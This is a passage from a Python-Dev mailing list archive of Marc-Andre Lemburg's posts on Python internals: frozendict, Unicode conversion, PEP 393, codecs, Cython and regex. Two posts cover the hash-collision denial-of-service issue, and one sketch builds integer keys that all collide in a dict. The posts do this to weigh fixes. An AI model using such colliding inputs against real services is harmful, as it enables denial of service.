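That tuple-like rule is easy to sketch. The following is an illustrative implementation, not a proposed one: mutation is blocked, and hashing fails exactly when a key or value is unhashable.

```python
class frozendict(dict):
    """Immutable dict; hashable only if all keys and values are
    hashable, mirroring the behaviour of tuples (sketch only)."""

    def _immutable(self, *args, **kwargs):
        raise TypeError('frozendict is immutable')

    # Block all mutating dict methods.
    __setitem__ = __delitem__ = _immutable
    clear = pop = popitem = setdefault = update = _immutable

    def __hash__(self):
        # frozenset() hashes each (key, value) pair, so this raises
        # TypeError if any value is unhashable -- like a tuple
        # containing a mutable item.
        return hash(frozenset(self.items()))
```

Two equal frozendicts hash equally, while `hash(frozendict(x=[1]))` raises TypeError instead of silently freezing the list.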

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] accept string in a2b and base64?

2012-02-21 Thread M.-A. Lemburg
Nick Coghlan wrote:
 The reason Python 2's implicit str-unicode conversions are so
 problematic isn't just because they're implicit: it's because they
 effectively assume *latin-1* as the encoding on the 8-bit str side.

The implicit conversion in Python2 only works with ASCII content,
pretty much like what you describe here.

Note that e.g. UTF-16 is not an ASCII super set, but the ASCII
assumption still works:

 >>> u'abc'.encode('utf-16-le').decode('ascii')
 u'a\x00b\x00c\x00'

Apart from that nit (which can be resolved in most cases by
disallowing 0 bytes), I still believe that the Python2 implicit
conversion between Unicode and 8-bit strings is a very useful
feature in practice.
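The ASCII-only behaviour can be reproduced explicitly in Python 3, showing both the case that worked implicitly in Python 2 and the case that raised:

```python
# UTF-16-LE of 'abc' contains only bytes < 128, so an ASCII decode
# succeeds -- this is why the implicit Python 2 coercion "worked"
# even though UTF-16 is not an ASCII superset:
data = 'abc'.encode('utf-16-le')      # b'a\x00b\x00c\x00'
assert data.decode('ascii') == 'a\x00b\x00c\x00'

# Any byte >= 128 was never implicitly coerced; it raised instead:
try:
    b'caf\xe9'.decode('ascii')
except UnicodeDecodeError:
    pass  # the implicit conversion failed loudly in Python 2 too
```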

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] PEP: New timestamp formats

2012-02-02 Thread M.-A. Lemburg
Nick Coghlan wrote:
 On Thu, Feb 2, 2012 at 10:16 PM, Victor Stinner
 Add an argument to change the result type
 -

 There should also be a description of the set a boolean flag to
 request high precision output approach.

 You mean something like: time.time(hires=True)? Or time.time(decimal=True)?
 
 Yeah, I was thinking hires as the short form of high resolution,
 but it's a little confusing since it also parses as the word hires
 (i.e. hire+s). hi_res, hi_prec (for high precision) or
 full_prec (for full precision) might be better.

Isn't the above (having the return type depend on an argument
setting) something we generally try to avoid ?

I think it's better to settle on one type for high-res timers and
add a new API(s) for it.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Counting collisions for the win

2012-01-23 Thread M.-A. Lemburg
Frank Sievertsen wrote:
 Hello,
 
 I'd still prefer to see a randomized hash()-function (at least for 3.3).
 
 But to protect against the attacks it would be sufficient to use
 randomization for collision resolution in dicts (and sets).
 
 What if we use a second (randomized) hash-function in case there
 are many collisions in ONE lookup. This hash-function is used only
 for collision resolution and is not cached.

This sounds a lot like what I'm referring to as universal hash function
in the discussion on the ticket:

http://bugs.python.org/issue13703#msg150724
http://bugs.python.org/issue13703#msg150795
http://bugs.python.org/issue13703#msg151813

However, I don't like the term random in there. It's better to make
the approach deterministic to avoid issues with not being able
to easily reproduce Python application runs for debugging purposes.

If you find that the data is manipulated, simply incrementing the
universal hash parameter and rehashing the dict with that parameter
should be enough to solve the issue (if not, which is highly unlikely,
the dict will simply reapply the fix). No randomness needed.
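A toy parameterized hash illustrates the idea; the constants are arbitrary and this is not CPython's hash function. Because each step (XOR with a constant, multiply by an odd constant mod 2**64) is a bijection, changing the parameter deterministically changes every hash value:

```python
def universal_hash(s, param=0):
    """Parameterized string hash (illustrative sketch only).

    Incrementing `param` changes all hash values deterministically,
    so a dict that detects too many collisions can rehash itself
    with param + 1 -- no randomness needed, and runs stay reproducible.
    """
    h = (param * 1000003 + 0x345678) & 0xFFFFFFFFFFFFFFFF
    for ch in s:
        h = ((h ^ ord(ch)) * 1000003) & 0xFFFFFFFFFFFFFFFF
    return h ^ len(s)
```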

BTW: I attached a demo script to the ticket which demonstrates both
types of collisions using integers.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Hash collision security issue (now public)

2011-12-29 Thread M.-A. Lemburg
Mark Shannon wrote:
 Michael Foord wrote:
 Hello all,

 A paper (well, presentation) has been published highlighting security 
 problems with the hashing
 algorithm (exploiting collisions) in many programming languages Python 
 included:

 
 http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf


 Although it's a security issue I'm posting it here because it is now public 
 and seems important.

 The issue they report can cause (for example) handling an http post to 
 consume horrible amounts of
 cpu. For Python the figures they quoted:

 - reasonable-sized attack strings only for 32 bits
 - Plone has max. POST size of 1 MB
 - 7 minutes of CPU usage for a 1 MB request
 - ~20 kbits/s → keep one Core Duo core busy

 This was apparently reported to the security list, but hasn't been responded 
 to beyond an
 acknowledgement on November 24th (the original report didn't make it onto 
 the security list
 because it was held in a moderation queue).
 The same vulnerability was reported against various languages and web 
 frameworks, and is already
 fixed in some of them.

 Their recommended fix is to randomize the hash function.

 
 The attack relies on being able to predict the hash value for a given string. 
 Randomising the string
 hash function is quite straightforward.
 There is no need to change the dictionary code.
 
 A possible (*untested*) patch is attached. I'll leave it for those more 
 familiar with
 unicodeobject.c to do properly.

The paper mentions that several web frameworks work around this by
limiting the number of parameters per GET/POST/HEAD request.

This sounds like a better alternative than randomizing the hash
function of strings.

Uncontrollable randomization has issues when you work with
multi-process setups, since the processes would each use different
hash values for identical strings. Putting the base_hash value
under application control could be done to solve this problem,
making sure that all processes use the same random base value.

BTW: Since your randomization trick uses the current time, it would
also be rather easy to tune an attack to find the currently
used base_hash. To make this safe, you'd have to use a more
random source for initializing the base_hash.

Note that the same hash collision attack can be used for
other key types as well, e.g. integers (where it's very easy
to find hash collisions), so this kind of randomization
would have to be applied to other basic types too.
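For integers, colliding keys are indeed trivial to construct in CPython, where hash(n) == n for small ints. A sketch of the problem, not a fix:

```python
# CPython dicts with 2**k slots select a slot from the low k bits of
# the hash. Since hash(n) == n for small ints, any set of keys whose
# low bits agree all probe the same slot:
colliding = [i << 20 for i in range(1000)]   # low 20 bits are all zero
slots = {hash(k) & 0xFF for k in colliding}  # slot index in a 256-slot table
assert slots == {0}                          # every key lands in slot 0
```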

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] PEP 393 close to pronouncement

2011-10-11 Thread M.-A. Lemburg
Victor Stinner wrote:
 Given that I've been working on and maintaining the Python Unicode
 implementation actively or by providing assistance for almost
 12 years now, I've also thought about whether it's still worth
 the effort.
 
 Thanks for your huge work on Unicode, Marc-Andre!

Thanks. I enjoyed working on it, but priorities are different
now, and new projects are waiting :-)

 My interests have shifted somewhat into other directions and
 I feel that helping Python reach world domination in other ways
 makes me happier than fighting over Unicode standards, implementations,
 special cases that aren't special enough, and all those other
 nitty-gritty details that cause long discussions :-)
 
 Someone said that we still need to define what a character is! By the way, 
 what 
 is a code point?

I'll leave that as exercise for the interested reader to find out :-)

(Hint: Google should find enough hits where I've explained those things
on various mailing lists and in talks I gave.)

 So I feel that the PEP 393 change is a good time to draw a line
 and leave Unicode maintenance to Ezio, Victor, Martin, and
 all the others that have helped over the years. I know it's
 in good hands.
 
 I don't understand why you would like to stop contributing to Unicode, but 

I only have limited time available for these things and am
nowadays more interested in getting others to recognize just
how great Python is, than actually sitting down and writing
patches for it.

Unicode was my baby for quite a few years, but I now have two
kids which need more love and attention :-)

 well, as you want. We will try to continue your work.

Thanks.

Cheers,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] PEP 393 close to pronouncement

2011-09-28 Thread M.-A. Lemburg
Guido van Rossum wrote:
 Given the feedback so far, I am happy to pronounce PEP 393 as
 accepted. Martin, congratulations! Go ahead and mark it as Accepted.
 (But please do fix up the small nits that Victor reported in his
 earlier message.)

I've been working on feedback for the last few days, but I guess it's
too late. Here goes anyway...

I've only read the PEP and not followed the discussion due to lack of
time, so if any of this is no longer valid, that's probably because
the PEP wasn't updated :-)

Resizing


Codecs use resizing a lot. Given that PyCompactUnicodeObject
does not support resizing, most decoders will have to use
PyUnicodeObject and thus not benefit from the memory footprint
advantages of e.g. PyASCIIObject.


Data structure
--

The data structure description in the PEP appears to be wrong:

PyASCIIObject has a wchar_t *wstr pointer - I guess this should
be a char *str pointer, otherwise, where's the memory footprint
advantage (esp. on Linux where sizeof(wchar_t) == 4) ?

I also don't see a reason to limit the UCS1 storage version
to ASCII. Accordingly, the object should be called PyLatin1Object
or PyUCS1Object.

Here's the version from the PEP:


typedef struct {
  PyObject_HEAD
  Py_ssize_t length;
  Py_hash_t hash;
  struct {
  unsigned int interned:2;
  unsigned int kind:2;
  unsigned int compact:1;
  unsigned int ascii:1;
  unsigned int ready:1;
  } state;
  wchar_t *wstr;
} PyASCIIObject;

typedef struct {
  PyASCIIObject _base;
  Py_ssize_t utf8_length;
  char *utf8;
  Py_ssize_t wstr_length;
} PyCompactUnicodeObject;


Typedef'ing Py_UNICODE to wchar_t and using wchar_t in existing
code will cause problems on some systems where wchar_t is a
signed type.

Python assumes that Py_UNICODE is unsigned and thus doesn't
check for negative values or takes these into account when
doing range checks or code point arithmetic.

On platforms where wchar_t is signed, it is safer to
typedef Py_UNICODE to an unsigned type of the same width.

Accordingly, and to prevent further breakage, Py_UNICODE
should not be deprecated; it should be used instead of
wchar_t throughout the code.


Length information
--

Py_UNICODE access to the objects assumes that len(obj) ==
length of the Py_UNICODE buffer. The PEP suggests that length
should not take surrogates into account on UCS2 platforms
such as Windows. This causes len(obj) to not match len(wstr).

As a result, Py_UNICODE access to the Unicode objects breaks
when surrogate code points are present in the Unicode object
on UCS2 platforms.

The PEP also does not explain how lone surrogates will be
handled with respect to the length information.

Furthermore, determining len(obj) will require a loop over
the data, checking for surrogate code points. A simple memcpy()
is no longer enough.

I suggest to drop the idea of having len(obj) not count
wstr surrogate code points to maintain backwards compatibility
and allow for working with lone surrogates.

Note that the whole surrogate debate does not have much to
do with this PEP, since it's mainly about memory footprint
savings. I'd also urge to do a reality check with respect
to surrogates and non-BMP code points: in practice you only
very rarely see any non-BMP code points in your data. Making
all Python users pay for the needs of a tiny fraction is
not really fair. Remember: practicality beats purity.
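
The length question can be made concrete in current Python 3 (a
sketch; results shown are for CPython with PEP 393 strings, where
len() counts code points and lone surrogates are stored as-is):

```python
# A lone surrogate is an ordinary code point inside a str and
# counts toward len().
lone = '\ud800'
assert len(lone) == 1

# Two surrogate escapes stay two separate code points; they are
# NOT joined into the non-BMP character they would encode.
pair = '\ud83d\ude00'
assert len(pair) == 2
assert pair != '\U0001F600'     # the real code point...
assert len('\U0001F600') == 1   # ...has length 1
```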


API
---

Victor already described the needed changes.


Performance
---

The PEP only lists a few low-level benchmarks as basis for the
performance decrease. I'm missing some more adequate real-life
tests, e.g. using an application framework such as Django
(to the extent this is possible with Python3) or a server
like the Radicale calendar server (which is available for Python3).

I'd also like to see a performance comparison which specifically
uses the existing Unicode APIs to create and work with Unicode
objects. Most extensions will use this way of working with the
Unicode API, either because they want to support Python 2 and 3,
or because the effort it takes to port to the new APIs is
too high. The PEP makes some statements that this is slower,
but doesn't quantify those statements.


Memory savings
--

The table only lists string sizes up to 8 code points. The memory
savings for these are really only significant for ASCII
strings on 64-bit platforms, if you use the default UCS2
Python build as basis.

For larger strings, I expect the savings to be more significant.
OTOH, a single non-BMP code point in such a string would cause
the savings to drop significantly again.
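
Both effects are easy to observe with sys.getsizeof under PEP 393:
the per-character width is chosen from the widest code point present
(a sketch; exact byte counts are platform- and version-dependent, so
only the ordering is checked):

```python
import sys

ascii_s  = 'a' * 100            # 1 byte per code point (ASCII)
latin1_s = '\xe9' * 100         # 1 byte per code point (Latin-1)
bmp_s    = '\u20ac' * 100       # 2 bytes per code point
astral_s = '\U0001F600' * 100   # 4 bytes per code point

assert sys.getsizeof(ascii_s) <= sys.getsizeof(latin1_s)
assert sys.getsizeof(latin1_s) < sys.getsizeof(bmp_s) < sys.getsizeof(astral_s)

# A single non-BMP code point widens the whole string:
mixed = 'a' * 99 + '\U0001F600'
assert sys.getsizeof(mixed) == sys.getsizeof(astral_s)
```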


Complexity
--

In order to benefit from the new API, any code that has to
deal with low-level Py_UNICODE access to the Unicode objects
will have to be adapted.

For best performance, each algorithm will have to be implemented
for all three storage types.

Not doing so will result in a slow-down, if I read the PEP
correctly. It's difficult to say of what scale, since that
information 

Re: [Python-Dev] Not able to do unregister a code

2011-09-15 Thread M.-A. Lemburg
Jai Sharma wrote:
 Hi,
 
 I am facing a memory leak issue with codecs. I make my own ABC class and
 register it with codecs.
 
 import codecs
 codecs.register(ABC)
 
 but I am not able to remove ABC from memory. Is there any alternative way to do
 that?

The ABC codec search function gets added to the codec registry search
path list which currently cannot be accessed directly.

There is no API to unregister a codec search function, since deregistration
would break the codec cache used by the registry to speed up codec
lookup.

Why would you want to unregister a codec search function ?
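
For reference, this is roughly what registering a search function
looks like (a sketch; the 'identity' codec name and its UTF-8
passthrough behaviour are made up for illustration):

```python
import codecs

def _search(name):
    """Return a CodecInfo for our made-up 'identity' codec, else None."""
    if name == 'identity':
        return codecs.CodecInfo(
            name='identity',
            encode=lambda s, errors='strict': (s.encode('utf-8'), len(s)),
            decode=lambda b, errors='strict': (bytes(b).decode('utf-8'), len(b)),
        )
    return None  # let the registry try the next search function

codecs.register(_search)
assert codecs.encode('abc', 'identity') == b'abc'
# Once registered (and once a lookup has been cached), there is no
# way to take _search out of the registry again on the Python
# versions discussed here.
```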

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Ctypes and the stdlib (was Re: LZMA compression support in 3.3)

2011-08-29 Thread M.-A. Lemburg
Guido van Rossum wrote:
 On Sun, Aug 28, 2011 at 11:23 AM, Stefan Behnel stefan...@behnel.de wrote:
 Hi,

 sorry for hooking in here with my usual Cython bias and promotion. When the
 question comes up what a good FFI for Python should look like, it's an
 obvious reaction from my part to throw Cython into the game.

 Terry Reedy, 28.08.2011 06:58:

 Dan, I once had more or less the same opinion/question as you with
 regard to ctypes, but I now see at least 3 problems.

 1) It seems hard to write it correctly. There are currently 47 open ctypes
 issues, with 9 being feature requests, leaving 38 behavior-related issues.
 Tom Heller has not been able to work on it since the beginning of 2010 and
 has formally withdrawn as maintainer. No one else that I know of has taken
 his place.

 Cython has an active set of developers and a rather large and growing user
 base.

 It certainly has lots of open issues in its bug tracker, but most of them
 are there because we *know* where the development needs to go, not so much
 because we don't know how to get there. After all, the semantics of Python
 and C/C++, between which Cython sits, are pretty much established.

 Cython compiles to C code for CPython, (hopefully soon [1]) to Python+ctypes
 for PyPy and (mostly [2]) C++/CLI code for IronPython, which boils down to
 the same build time and runtime kind of dependencies that the supported
 Python runtimes have anyway. It does not add dependencies on any external
 libraries by itself, such as the libffi in CPython's ctypes implementation.

 For the CPython backend, the generated code is very portable and is
 self-contained when compiled against the CPython runtime (plus, obviously,
 libraries that the user code explicitly uses). It generates efficient code
 for all existing CPython versions starting with Python 2.4, with several
 optimisations also for recent CPython versions (including the upcoming 3.3).


 2) It is not trivial to use it correctly.

 Cython is basically Python, so Python developers with some C or C++
 knowledge tend to get along with it quickly.

 I can't say yet how easy it is (or will be) to write code that is portable
 across independent Python implementations, but given that that field is
 still young, there's certainly a lot that can be done to aid this.
 
 Cython does sound attractive for cross-Python-implementation use. This
 is exciting.
 
 I think it needs a SWIG-like
 companion script that can write at least first-pass ctypes code from the .h
 header files. Or maybe it could/should use header info at runtime (with the
 .h bundled with a module).

 From my experience, this is a nice to have more than a requirement. It has
 been requested for Cython a couple of times, especially by new users, and
 there are a couple of scripts out there that do this to some extent. But the
 usual problem is that Cython users (and, similarly, ctypes users) do not
 want a 1:1 mapping of a library API to a Python API (there's SWIG for that),
 and you can't easily get more than a trivial mapping out of a script. But,
 yes, a one-shot generator for the necessary declarations would at least help
 in cases where the API to be wrapped is somewhat large.
 
 Hm, the main use that was proposed here for ctypes is to wrap existing
 libraries (not to create nicer APIs, that can be done in pure Python
 on top of this). In general, an existing library cannot be called
 without access to its .h files -- there are probably struct and
 constant definitions, platform-specific #ifdefs and #defines, and
 other things in there that affect the linker-level calling conventions
 for the functions in the library. (Just like Python's own .h files --
 e.g. the extensive renaming of the Unicode APIs depending on
 narrow/wide build) How does Cython deal with these? I wonder if for
 this particular purpose SWIG isn't the better match. (If SWIG weren't
 universally hated, even by its original author. :-)

SIP is an alternative to SWIG:

 http://www.riverbankcomputing.com/software/sip/intro
 http://pypi.python.org/pypi/SIP

and there are a few others as well:

 http://wiki.python.org/moin/IntegratingPythonWithOtherLanguages

 3) It seems to be slower than compiled C extension wrappers. That, at
 least, was the discovery of someone who re-wrote pygame using ctypes. (The
 hope was that using ctypes would aid porting to 3.x, but the time penalty
 was apparently too much for time-critical code.)

 Cython code can be as fast as C code, and in some cases, especially when
 developer time is limited, even faster than hand written C extensions. It
 allows for a straightforward optimisation path from regular Python code
 down to the speed of C, and trivial interaction with C code itself, if the
 need arises.

 Stefan


 [1] The PyPy port of Cython is currently being written as a GSoC project.

 [2] The IronPython port of Cython was written to facilitate a NumPy port to
 the .NET environment. It's currently not a complete port of all Cython

Re: [Python-Dev] PEP 393 review

2011-08-29 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 tl;dr: PEP-393 reduces the memory usage for strings of a very small
 Django app from 7.4MB to 4.4MB, all other objects taking about 1.9MB.
 
 Am 26.08.2011 16:55, schrieb Guido van Rossum:
 It would be nice if someone wrote a test to roughly verify these
 numbers, e.v. by allocating lots of strings of a certain size and
 measuring the process size before and after (being careful to adjust
 for the list or other data structure required to keep those objects
 alive).
 
 I have now written a Django application to measure the effect of PEP
 393, using the debug mode (to find all strings), and sys.getsizeof:
 
 https://bitbucket.org/t0rsten/pep-393/src/ad02e1b4cad9/pep393utils/djmemprof/count/views.py
 
 The results for 3.3 and pep-393 are attached.
 
 The Django app is small in every respect: trivial ORM, very few
 objects (just for the sake of exercising the ORM at all),
 no templating, short strings. The memory snapshot is taken in
 the middle of a request.
 
 The tests were run on a 64-bit Linux system with 32-bit Py_UNICODE.

For comparison, could you run the test of the unmodified
Python 3.3 on a 16-bit Py_UNICODE version as well ?

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] PEP 393 Summer of Code Project

2011-08-26 Thread M.-A. Lemburg
Stefan Behnel wrote:
 Isaac Morland, 26.08.2011 04:28:
 On Thu, 25 Aug 2011, Guido van Rossum wrote:
 I'm not sure what should happen with UTF-8 when it (in flagrant
 violation of the standard, I presume) contains two separately-encoded
 surrogates forming a valid surrogate pair; probably whatever the UTF-8
 codec does on a wide build today should be good enough. Similarly for
 encoding to UTF-8 on a wide build if one managed to create a string
 containing a surrogate pair. Basically, I'm for a
 garbage-in-garbage-out approach (with separate library functions to
 detect garbage if the app is worried about it).

 If it's called UTF-8, there is no decision to be taken as to decoder
 behaviour - any byte sequence not permitted by the Unicode standard must
 result in an error (although, of course, *how* the error is to be
 reported
 could legitimately be the subject of endless discussion). There are
 security implications to violating the standard so this isn't just
 legalistic purity.

 Hmmm, doesn't look good:

 Python 2.6.1 (r261:67515, Jun 24 2010, 21:47:49)
 [GCC 4.2.1 (Apple Inc. build 5646)] on darwin
 Type "help", "copyright", "credits" or "license" for more information.
  >>> '\xed\xb0\x80'.decode('utf-8')
 u'\udc00'
 

 Incorrect! Although this is a narrow build - I can't say what the wide
 build would do.
 
 Works the same for me in a wide Py2.7 build, but gives me this in Py3:
 
 Python 3.1.2 (r312:79147, Sep 27 2010, 09:57:50)
 [GCC 4.4.3] on linux2
 Type "help", "copyright", "credits" or "license" for more information.
 >>> b'\xed\xb0\x80'.decode('utf-8')
 Traceback (most recent call last):
   File "<stdin>", line 1, in <module>
 UnicodeDecodeError: 'utf8' codec can't decode bytes in position 0-2:
 illegal encoding
 
 Same for current Py3.3 and the PEP393 build (although both have a better
 exception message now: UnicodeDecodeError: 'utf8' codec can't decode
 bytes in position 0-1: invalid continuation byte).

The reason for this is that the UTF-8 codec in Python 2.x
has never rejected lone surrogates, and it was used to
store Unicode literals in pyc files (using marshal)
and also by pickle for transferring Unicode strings,
so we could not simply start rejecting lone surrogates:
this would have caused compatibility problems.

That change was made in Python 3.x by having a special
error handler surrogatepass which allows the UTF-8
codec to process lone surrogates as well.
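
The difference is easy to check in Python 3, where the strict UTF-8
codec refuses lone surrogates and the 'surrogatepass' error handler
lets them round-trip:

```python
# Strict UTF-8 rejects a lone surrogate...
try:
    '\ud800'.encode('utf-8')
except UnicodeEncodeError:
    pass
else:
    raise AssertionError('expected a UnicodeEncodeError')

# ...while 'surrogatepass' encodes and decodes it unchanged.
encoded = '\ud800'.encode('utf-8', 'surrogatepass')
assert encoded == b'\xed\xa0\x80'
assert encoded.decode('utf-8', 'surrogatepass') == '\ud800'
```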

BTW: I'd love to join the discussion about PEP 393, but
unfortunately I'm swamped with work, so these are just
a few comments...

What I'm missing in the discussion is statistics of the
effects of the patch (both memory and performance) and
the effect on 3rd party extensions.

I'm not convinced that the memory/speed tradeoff is worth the
breakage or whether the patch actually saves memory in real world
applications and I'm unsure whether the needed code changes to
the binary Python Unicode API can be done in a minor Python
release.

Note that in the worst case, a PEP 393 Unicode object will
store three versions of the same string, e.g. on Windows
with sizeof(wchar_t)==2: a UCS4 version in str,
a UTF-8 version in utf8 (this gets built whenever Python needs
a UTF-8 version of the object) and a wchar_t version in wstr
(which gets built whenever Python codecs or extensions need
Py_UNICODE or a wchar_t representation).
On all platforms, in the case where you store a Latin-1
non-ASCII string: str holds the Latin-1 string, utf8 the
UTF-8 version and wstr the 2- or 4-byte wchar_t version.


* A note on terminology: Python stores Unicode as code points.

A Unicode code point refers to any value in the Unicode code
range, which is 0 - 0x10FFFF. Lone surrogates, unassigned
and illegal code points are all still code points - this is
a detail people often forget. Various code points in Unicode
have special meanings, and some are not allowed to be
used in encodings, but that does not rule them
out from being stored and processed as code points.

Code units are only used in encoded versions of Unicode, e.g.
UTF-8, UTF-16 and UTF-32. Mixing code units and code points
can cause much confusion, so it's better to talk only
about code points when referring to Python Unicode objects,
since you only ever meet code units when looking at
the bytes output of the codecs.

This is important to know, since Python is not only meant
to process Unicode, but also to build Unicode strings, so
a careful distinction has to be made when considering what
is correct and what not: codecs have to follow much more
strict rules than Python itself.
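
The distinction is visible whenever a string is encoded: one code
point can become several code units (Python 3 behavior):

```python
euro = '\u20ac'                  # one code point: U+20AC EURO SIGN
assert len(euro) == 1            # str length counts code points

assert len(euro.encode('utf-8')) == 3        # three 8-bit code units
assert len(euro.encode('utf-16-le')) == 2    # one 16-bit code unit (2 bytes)
assert len(euro.encode('utf-32-le')) == 4    # one 32-bit code unit (4 bytes)

smiley = '\U0001F600'            # a non-BMP code point
assert len(smiley) == 1
assert len(smiley.encode('utf-16-le')) == 4  # two 16-bit code units: a surrogate pair
```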


* A note on surrogates: These are just one particular problem
where you run into the situation where splitting a Unicode
string potentially breaks a combination of code points.
There are a few other types of code points that cause similar
problems, e.g. combining code points.

Simply going with UCS-4 does not solve the problem, since
even with UCS-4 storage, you can still have surrogates in your
Python Unicode string. As with many things, it is important

Re: [Python-Dev] Should we move to replace re with regex?

2011-08-26 Thread M.-A. Lemburg
Guido van Rossum wrote:
 I just made a pass of all the Unicode-related bugs filed by Tom
 Christiansen, and found that in several, the response was this is
 fixed in the regex module [by Matthew Barnett]. I started replying
 that I thought that we should fix the bugs in the re module (i.e.,
 really in _sre.c) but on second thought I wonder if maybe regex is
 mature enough to replace re in Python 3.3. It would mean that we won't
 fix any of these bugs in earlier Python versions, but I could live
 with that.
 
 However, I don't know much about regex -- how compatible is it, how
 fast is it (including extreme cases where the backtracking goes
 crazy), how bug-free is it, and so on. Plus, how much work would it be
 to actually incorporate it into CPython as a complete drop-in
 replacement of the re package (such that nobody needs to change their
 imports or the flags they pass to the re module).
 
 We'd also probably have to train some core developers to be familiar
 enough with the code to maintain and evolve it -- I assume we can't
 just volunteer Matthew to do so forever... :-)
 
 What's the alternative? Is adding the requested bug fixes and new
 features to _sre.c really that hard?

Why not simply add the new lib, see whether it works out and
then decide which path to follow.

We've done that with the old regex lib. It took a few years
and releases to have people port their applications to the
then new re module and syntax, but in the end it worked.

With a new regex library there are likely going to be quite
a few subtle differences between re and regex - even if it's
just doing things in a more Unicode compatible way.

I don't think anyone can actually list all the differences given
the complex nature of regular expressions, so people will
likely need a few years and releases to get used to it before
a switch can be made.
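
The "let them coexist" approach costs applications very little; code
that wants the newer semantics can opt in explicitly and fall back
otherwise (a sketch; regex here refers to the third-party module on
PyPI, which may not be installed):

```python
# Prefer the third-party regex module when available, fall back to re.
try:
    import regex as re_impl
except ImportError:
    import re as re_impl

# Both expose the familiar interface, so call sites stay unchanged.
assert re_impl.match(r'\w+', 'hello world').group(0) == 'hello'
```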

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Should we move to replace re with regex?

2011-08-26 Thread M.-A. Lemburg
Guido van Rossum wrote:
 On Fri, Aug 26, 2011 at 3:09 PM, M.-A. Lemburg m...@egenix.com wrote:
 Guido van Rossum wrote:
 I just made a pass of all the Unicode-related bugs filed by Tom
 Christiansen, and found that in several, the response was this is
 fixed in the regex module [by Matthew Barnett]. I started replying
 that I thought that we should fix the bugs in the re module (i.e.,
 really in _sre.c) but on second thought I wonder if maybe regex is
 mature enough to replace re in Python 3.3. It would mean that we won't
 fix any of these bugs in earlier Python versions, but I could live
 with that.

 However, I don't know much about regex -- how compatible is it, how
 fast is it (including extreme cases where the backtracking goes
 crazy), how bug-free is it, and so on. Plus, how much work would it be
 to actually incorporate it into CPython as a complete drop-in
 replacement of the re package (such that nobody needs to change their
 imports or the flags they pass to the re module).

 We'd also probably have to train some core developers to be familiar
 enough with the code to maintain and evolve it -- I assume we can't
 just volunteer Matthew to do so forever... :-)

 What's the alternative? Is adding the requested bug fixes and new
 features to _sre.c really that hard?

 Why not simply add the new lib, see whether it works out and
 then decide which path to follow.

 We've done that with the old regex lib. It took a few years
 and releases to have people port their applications to the
 then new re module and syntax, but in the end it worked.

 With a new regex library there are likely going to be quite
 a few subtle differences between re and regex - even if it's
 just doing things in a more Unicode compatible way.

 I don't think anyone can actually list all the differences given
 the complex nature of regular expressions, so people will
 likely need a few years and releases to get used to it before
 a switch can be made.
 
 I can't say I liked how that transition was handled last time around.
 I really don't want to have to tell people Oh, that bug is fixed but
 you have to use regex instead of re and then a few years later have
 to tell them Oh, we're deprecating regex, you should just use re.

No, you tell them: If you want Unicode 6 semantics, use regex,
if you're fine with Unicode 2.0/3.0 semantics, use re. After all,
it's not like re suddenly stopped working :-)

 I'm really hoping someone has more actual technical understanding of
 re vs. regex and can give us some facts about the differences, rather
 than, frankly, FUD.

The good part is that it's based on the re code, the FUD comes
from the fact that the new lib is 380kB larger than the old one
and that's not even counting the generated 500kB of lookup
tables.

If no one steps up to do a review or analysis, I think the
only practical way to test the lib is to give it a prominent
chance to prove itself.

The other aspect is maintenance.

Perhaps we could have a summer of code student do a review and
analysis to get familiar with the code and then have at least
two developers know the code well enough to support it for
a while.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)

2011-07-29 Thread M.-A. Lemburg
Victor Stinner wrote:
 On 28/07/2011 11:28, Victor Stinner wrote:
 Please do keep the original implementation
 around (e.g. renamed to codecs.open_stream()), though, so that it's
 still possible to get easy-to-use access to codec StreamReader/Writers.

 I will add your alternative to the PEP (except if you would like to do
 that yourself?). If I understood correctly, you propose to:

 * rename codecs.open() to codecs.open_stream()
 * change codecs.open() to reuse open() (and so io.TextIOWrapper)

 (and don't deprecate anything)
 
 I added your proposal to the PEP as an Alternative Approach.

Thanks.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)

2011-07-28 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 Three weeks ago, I posted a draft of my PEP on this mailing list. I
 tried to include all remarks you made, and the PEP is now online:
 
http://www.python.org/dev/peps/pep-0400/
 
 It's now unclear to me if the PEP will be accepted or rejected. I don't
 know what to do to move forward.

The PEP still compares apples and oranges, issues and features,
and doesn't cover the fact that it is proposing to not just deprecate
a feature, but a part of a design concept which will then no longer
be available in Python.

I'm still -1 on that part of the PEP.

As I mentioned before, having
codecs.open() changed to be a wrapper around io.open() in Python 3.3,
should be investigated. If it doesn't cause too much trouble, this
would be a good idea. Please do keep the original implementation
around (e.g. renamed to codecs.open_stream()), though, so that it's
still possible to get easy-to-use access to codec StreamReader/Writers.
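
One user-visible difference between the two stacks is newline
handling: the codec StreamReader hands back whatever newlines are
in the data, while io.TextIOWrapper applies universal-newline
translation by default (a sketch using a temporary file):

```python
import codecs
import io
import os
import tempfile

fd, path = tempfile.mkstemp()
os.write(fd, b'a\r\nb\n')
os.close(fd)

# codecs.open() always opens the file in binary mode underneath;
# the StreamReader does not translate newlines.
with codecs.open(path, 'r', encoding='ascii') as f:
    assert f.read() == 'a\r\nb\n'

# io.open() wraps the stream in a TextIOWrapper, which translates
# '\r\n' to '\n' by default.
with io.open(path, 'r', encoding='ascii') as f:
    assert f.read() == 'a\nb\n'

os.remove(path)
```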

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Draft PEP: Deprecate codecs.StreamReader and codecs.StreamWriter

2011-07-07 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 Last May, I proposed to deprecate the open() function, StreamWriter and
 StreamReader classes of the codecs module. I agreed to keep open()
